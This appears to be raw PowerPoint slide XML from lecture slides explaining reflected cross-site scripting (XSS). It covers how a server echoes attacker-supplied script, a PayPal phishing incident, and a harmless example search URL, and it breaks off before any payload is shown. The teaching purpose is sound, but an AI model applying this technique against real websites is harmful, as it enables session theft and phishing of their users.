                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9FD11BE-2348-CA4B-86F8-869140862769}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1106488" y="6219825"/>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63851" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D0475852-E8C9-DD4A-BFBB-52469BE8B540}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1409700" y="4810125"/>
            <a:ext cx="7826375"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900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker gets you to send </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>a URL that  includes Javascript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="975"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>echoes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>the script back to you in its response</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="2800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1175"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Your browser executes the script in the response within  the same origin as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEAA4F47-DDCD-6642-9046-9F88834022E7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164867" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E38BA73-A4C2-8B4F-8BF1-BF88480905DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1069975" y="2597150"/>
            <a:ext cx="7918450" cy="428625"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0"/>
            <a:endParaRPr lang="en-GB" altLang="en-US">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="164868" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44BD3A70-8756-BA4E-89ED-A87B3D1DD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9529763"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CE53A09-6C28-EB46-AA9E-0A99C74BDD64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2513013" y="1244600"/>
            <a:ext cx="5029200" cy="776288"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr tIns="7307" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="6354">
              <a:spcBef>
                <a:spcPts val="57"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="-450" dirty="0"/>
              <a:t>Reflected</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-235" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-553" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165891" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{505252B1-3267-D14E-AD7C-AD000B1E0800}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="3082925"/>
            <a:ext cx="8456613"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744"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350"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attackers contacted PayPal users via email and fooled them into accessing  a URL hosted on the legitimate PayPal website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2350"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1688"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Injected code redirected PayPal visitors to a page warning users their  accounts had been compromised.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2350"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1688"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="1900">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Victims were then redirected to a phishing site and prompted to enter  sensitive financial data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="165892" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84238A1B-B857-8546-94E5-9E0007B10623}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6480175" y="5429250"/>
            <a:ext cx="3182938" cy="9064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385EBB5-E5D7-EE42-B0A1-23AD2089DBFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1940090">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="55" dirty="0"/>
              <a:t>Echoed</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="67" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD8C7B92-0EA4-A64C-A72C-08A9B8C0E92E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766763" y="1860550"/>
            <a:ext cx="152400" cy="322263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" spc="313" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="166916" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E96062D1-14E2-A24C-995F-9A09808B4D38}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1109663" y="1817688"/>
            <a:ext cx="7716837"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525">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375"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The key to the reflected XSS attack is to find  instances where a good web server will echo the  user input back in the HTML response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1BC8800-5A07-6E42-A98E-D0BC3939F7C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1940090">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="55" dirty="0"/>
              <a:t>Echoed</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="67" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2AEBD14-EFA8-E141-8A08-FFFC3A83425C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766763" y="1860550"/>
            <a:ext cx="152400" cy="322263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" spc="313" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167940" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A49FFFC-DD2E-B149-81D1-CD689A1F1564}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1109663" y="1817688"/>
            <a:ext cx="7716837"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525">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375"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The key to the reflected XSS attack is to find  instances where a good web server will echo the  user input back in the HTML response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="167941" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D915BA7B-A14F-C848-8EAE-6264163CE2DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1876425" y="3871913"/>
            <a:ext cx="6305550" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF200"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="18903" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="4286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ts val="150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://victim.com/search.php?term=socks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2100" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3AAB9D7-FCF9-774C-9EC2-61B6E9DAC2D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3408363" y="3409950"/>
            <a:ext cx="4059237" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="27" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Input </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-16" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="-51" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2800" spc="55" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>bad.com:</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs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440E5A8-C6A9-2C49-A8B1-4873F5E158D5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="771525" y="812800"/>
            <a:ext cx="8515350" cy="784225"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="1940090">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr spc="55" dirty="0"/>
              <a:t>Echoed</a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-59" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="67" dirty="0"/>
              <a:t>input</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FD412C5-5257-7045-9B0F-77D7675B4A5A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="766763" y="1860550"/>
            <a:ext cx="152400" cy="322263"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2100" spc="313" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>•</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168964" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6E10B32-C894-BE46-ADE7-2C2AFF580848}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1109663" y="1817688"/>
            <a:ext cx="7716837"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525">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375"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The key to the reflected XSS attack is to find  instances where a good web server will echo the  user input back in the HTML response</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168965" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96524F05-068F-764D-BDC5-825F0DCA5957}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1876425" y="3871913"/>
            <a:ext cx="6305550" cy="342900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFF200"/>
          </a:solidFill>
          <a:ln w="12700">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="18903" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="4286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ts val="150"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2100" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://victim.com/search.php?term=socks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2100" b="1">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="168966" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FDAAE16-7BBF-4D4C-80C8-1AC512F60C60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1411288" y="5281613"/>
            <a:ext cx="7235825" cy="1973262"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 9354185"/>
              <a:gd name="T1" fmla="*/ 0 h 2476500"/>
              <a:gd name="T2" fmla="*/ 42571 w 9354185"/>
              <a:gd name="T3" fmla="*/ 0 h 2476500"/>
              <a:gd name="T4" fmla="*/ 42571 w 9354185"/>
              <a:gd name="T5" fmla="*/ 20995 h 2476500"/>
              <a:gd name="T6" fmla="*/ 0 w 9354185"/>
              <a:gd name="T7" fmla="*/ 20995 h 2476500"/>
              <a:gd name="T8" fmla="*/ 0 w 9354185"/>
              <a:gd name="T9" fmla="*/ 0 h 2476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4185" h="2476500">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9353778" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9353778" y="2476500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="24765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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93523BB6-7EDC-4B4B-AC78-6517512D0922}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="5313363"/>
            <a:ext cx="1277938" cy="369887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" b="1" spc="-4" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CB3FFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;title&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
